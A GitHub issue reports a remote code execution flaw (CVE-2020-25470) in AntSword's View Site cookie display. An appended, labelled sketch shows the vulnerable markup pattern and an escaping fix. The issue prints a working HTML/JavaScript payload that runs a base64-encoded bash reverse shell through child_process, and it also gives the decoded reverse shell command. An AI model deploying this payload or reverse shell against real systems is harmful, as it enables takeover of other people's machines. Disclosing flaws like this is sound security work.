RCE Vulnerability in View Site #256

Closed
leohearts opened this issue Aug 27, 2020 · 3 comments

@leohearts

AntSword Ver: 2.1.8.1

There is a view site function which will show cookies in the UI.
[image]
[image]
After a few tests I found that it can parse HTML tags.
[image]
So it can also execute JavaScript/Node code like this.
[image]
(I used a base64-encoded command which decodes as bash -i >& /dev/tcp/127.0.0.1/2333 0>&1)

@leohearts

My HTML code:

<script>document.cookie="a=<img src=x onerror='require(\"child_process\").exec(\"echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMjMzMyAwPiYxCg== | base64 -d | bash\")'/>"</script>

Write it into an HTML file, enter the address, then click "View".

@leohearts

Source code:
source/modules/viewsite/cookiemgr.js
source/modules/viewsite/index.js

@Medicean Medicean added the 🐛Bug (problem in the program itself) label Aug 27, 2020
@Medicean Medicean self-assigned this Sep 7, 2020
@leohearts

CVE-2020-25470
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25470
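
Added example, not part of the original issue and not AntSword's code: a sketch of the bug class reported above and its fix, assuming the cookie view builds its markup by string concatenation (the issue does not show the affected source). The function names and the sample cookie string are hypothetical and constructed for illustration.

```javascript
// Added illustration; not AntSword's code. All names here are hypothetical.

// Characters that let a string break out of HTML text or attribute context.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Split a document.cookie-style string into {name, value} pairs.
// Only the first "=" separates name from value; the value may contain more.
function parseCookieString(cookieString) {
  return cookieString
    .split(/;\s*/)
    .filter((part) => part.length > 0)
    .map((part) => {
      const eq = part.indexOf("=");
      return eq === -1
        ? { name: "", value: part }
        : { name: part.slice(0, eq), value: part.slice(eq + 1) };
    });
}

// Vulnerable pattern: site-controlled fields concatenated straight into markup.
function renderRowUnsafe(cookie) {
  return "<tr><td>" + cookie.name + "</td><td>" + cookie.value + "</td></tr>";
}

// Hardened pattern: every site-controlled field is escaped before it reaches markup.
function renderRowSafe(cookie) {
  return "<tr><td>" + escapeHtml(cookie.name) + "</td><td>" + escapeHtml(cookie.value) + "</td></tr>";
}

// Constructed sample: same shape as the reported cookie, with a harmless handler.
const SAMPLE = "a=<img src=x onerror='console.log(1)'/>; sid=42";

function demo() {
  const cookies = parseCookieString(SAMPLE);
  return {
    unsafe: cookies.map(renderRowUnsafe).join(""),
    safe: cookies.map(renderRowSafe).join(""),
  };
}

console.log(demo());
```

Escaping closes the markup injection itself; in an Electron renderer, whether injected script can reach `require` additionally depends on the window's Node integration settings.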
